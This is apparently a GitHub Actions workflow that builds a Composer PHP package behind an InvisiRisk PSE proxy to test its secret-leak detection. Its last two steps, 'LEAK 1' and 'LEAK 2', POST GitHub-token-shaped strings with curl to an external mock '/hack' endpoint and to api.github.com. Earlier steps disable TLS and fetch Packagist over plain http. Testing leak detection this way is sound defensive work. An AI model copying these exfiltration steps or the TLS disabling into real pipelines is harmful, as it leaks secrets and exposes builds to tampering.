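---
# Builds the Composer package inside an ubuntu container while an InvisiRisk
# PSE proxy runs as a job service. Two upstream jobs first register a scan in
# the IR portal (scan_id) and fetch registry credentials for the proxy image.
# The final two steps are named "LEAK 1"/"LEAK 2" and POST token-shaped strings
# to external endpoints — presumably deliberate detection-test fixtures for the
# proxy rather than real credentials; confirm with the pipeline owner before
# treating them as findings.
name: Build COMPOSER Package for Secrets

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

permissions:
  checks: write
  contents: read
  packages: read

env:
  API_URL: https://app.stage.veribom.com

jobs:
  create_scan_in_IR_Portal:
    runs-on: ubuntu-latest
    outputs:
      scan_id: ${{ steps.parseResponse.outputs.scan_id }}
    steps:
      - name: Initiating SBOM Scan
        id: createScan
        uses: fjogeleit/http-request-action@v1.15.1
        with:
          url: '${{ env.API_URL }}/utilityapi/v1/scan'
          method: 'POST'
          data: '{"api_key": "${{ secrets.VB_API_KEY_STAGE }}"}'
      - name: Parse Response
        id: parseResponse
        # The response body is produced by a remote service. The value is
        # handed to the shell through `env` instead of interpolating the
        # `${{ }}` expression into the command line, so the remote content
        # cannot inject shell syntax into this step.
        env:
          SCAN_ID: ${{ fromJSON(steps.createScan.outputs.response).data.scan_id }}
        run: echo "scan_id=$SCAN_ID" >> "$GITHUB_OUTPUT"

  ecr_details:
    runs-on: ubuntu-latest
    outputs:
      ecr_username: ${{ steps.ecr_details.outputs.username }}
      ecr_token: ${{ steps.ecr_details.outputs.token }}
      ecr_region: ${{ steps.ecr_details.outputs.region }}
      ecr_id: ${{ steps.ecr_details.outputs.registry_id }}
    steps:
      - name: Fetching VB Token
        id: fetchECRDetails
        uses: fjogeleit/http-request-action@v1.15.1
        with:
          # NOTE(review): the API key is sent in the query string here, while
          # the scan job sends it in the request body. Query strings are more
          # likely to land in server/proxy logs — confirm whether this endpoint
          # accepts the key in a body or header instead.
          url: '${{ env.API_URL }}/utilityapi/v1/registry?api_key=${{ secrets.VB_API_KEY_STAGE }}'
          method: 'GET'
      - name: Decoding VB Token
        id: parseToken
        # Same pattern as "Parse Response": the remote payload reaches the
        # shell only as an env var, never as part of the command text.
        env:
          TOKEN_B64: ${{ fromJson(steps.fetchECRDetails.outputs.response).data }}
        run: echo "DECODED_TOKEN=$(echo "$TOKEN_B64" | base64 -d)" >> "$GITHUB_OUTPUT"
      - name: ECR Details
        id: ecr_details
        # The decoded token is JSON; each field is still extracted with
        # fromJSON, but via env so no remote value is spliced into the script.
        # NOTE(review): `token` is a registry password carried as a plain job
        # output. It is not a registered repository secret, so it is not
        # auto-masked in logs; masking it with ::add-mask:: would likely make
        # GitHub skip the output, which the next job needs for `credentials`.
        env:
          ECR_USERNAME: ${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).username }}
          ECR_PASSWORD: ${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).password }}
          ECR_REGION: ${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).region }}
          ECR_REGISTRY_ID: ${{ fromJSON(steps.parseToken.outputs.DECODED_TOKEN).registry_id }}
        run: |
          {
            echo "username=$ECR_USERNAME"
            echo "token=$ECR_PASSWORD"
            echo "region=$ECR_REGION"
            echo "registry_id=$ECR_REGISTRY_ID"
          } >> "$GITHUB_OUTPUT"

  start_proxy_and_build:
    runs-on: ubuntu-latest
    needs: [create_scan_in_IR_Portal, ecr_details]
    services:
      pse:
        image: 282904853176.dkr.ecr.us-west-2.amazonaws.com/invisirisk/pse-proxy:dev-test
        credentials:
          username: ${{ needs.ecr_details.outputs.ecr_username }}
          password: ${{ needs.ecr_details.outputs.ecr_token }}
        env:
          PSE_DEBUG_FLAG: --alsologtostderr
          POLICY_LOG: t
          INVISIRISK_JWT_TOKEN: ${{ secrets.VB_API_KEY_STAGE }}
          # Repeats the workflow-level API_URL as a literal; the `env` context
          # does not appear to be usable inside services.<id>.env — verify if
          # the two values ever need to diverge.
          INVISIRISK_PORTAL: https://app.stage.veribom.com
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
    container:
      image: ubuntu:latest
      # NET_ADMIN is presumably what allows the PSE action below to redirect
      # the build container's traffic through the `pse` service — confirm.
      options: --cap-add=NET_ADMIN
    steps:
      - name: Checkout the code
        uses: actions/checkout@v3
      - name: Install curl
        run: |
          apt-get update
          apt-get install -y curl
      - name: Set up PHP
        uses: shivammathur/setup-php@v2
        with:
          php-version: "8.2"
          extensions: pdo, pdo_mysql, gd
      - name: Install system dependencies
        # NOTE(review): this runs inside the ubuntu:latest container, where the
        # "Install curl" step above uses apt-get without sudo; confirm sudo is
        # actually present in the container before relying on it here and in
        # the later steps.
        run: |
          sudo apt-get update
          sudo apt-get install -y libpng-dev libjpeg-dev libfreetype6-dev zip unzip git apache2
      - name: Install Composer
        run: |
          php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
          php composer-setup.php --install-dir=/usr/local/bin --filename=composer
          php -r "unlink('composer-setup.php');"
        # continue-on-error: false # This will cause the step to fail if Composer installation fails
      - name: Disable tls
        # Composer TLS verification is switched off and Packagist is reached
        # over plain http further down. Together with the CA configuration
        # step below this looks deliberate for traffic that is routed through
        # the intercepting PSE proxy; it must not be copied into a workflow
        # that runs without the proxy.
        run: |
          composer config --global disable-tls true
      - name: Run PSE Action
        uses: invisirisk/pse-action@v1.0.8
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          SCAN_ID: ${{ needs.create_scan_in_IR_Portal.outputs.scan_id }}
      - name: Configure CA Certificates
        # Points PHP's curl/openssl trust at the proxy CA bundle so requests
        # made through PHP accept the proxy's certificates.
        run: |
          # Extract the path of the php.ini file
          PHP_INI=$(php --ini | grep "Loaded Configuration File" | awk '{print $4}')
          echo "$PHP_INI"
          echo "curl.cainfo=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI"
          echo "openssl.cafile=/etc/ssl/certs/pse.pem" | sudo tee -a "$PHP_INI"
      - name: User http for packagist
        run: composer config -g repo.packagist composer http://repo.packagist.org
      - name: Install project dependencies
        run: |
          composer install --no-scripts --no-autoloader --prefer-dist --no-cache
        # continue-on-error: false # This will stop the workflow if install fails
      - name: Generate optimized autoload files
        run: composer dump-autoload --optimize
      - name: Set permissions
        run: sudo chown -R www-data:www-data .
      - name: Enable Apache mod_rewrite
        run: sudo a2enmod rewrite
      - name: Start Apache (if needed)
        run: |
          sudo service apache2 start
          sudo apache2ctl configtest
      # The two steps below send GitHub-token-shaped strings to external
      # endpoints. Their names mark them as intentional exfiltration probes
      # (presumably to verify the proxy detects and blocks them); the values are
      # test strings from this file, not live credentials. Keep them out of any
      # workflow that is not exercising the proxy.
      - name: Send POST request with GitHub token (LEAK 1)
        run: |
          curl -k -X POST https://vbirmock.free.beeceptor.com/hack \
            -H "Content-Type: application/json" \
            -d '{
              "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
            }'
      - name: Make API Request (LEAK 2)
        run: |
          curl -k -X POST https://api.github.com/endpoint \
            -d '{"name": "ghp_1234567890abcdef1234567890abcdef12345678", "description": "A description of my repository"}'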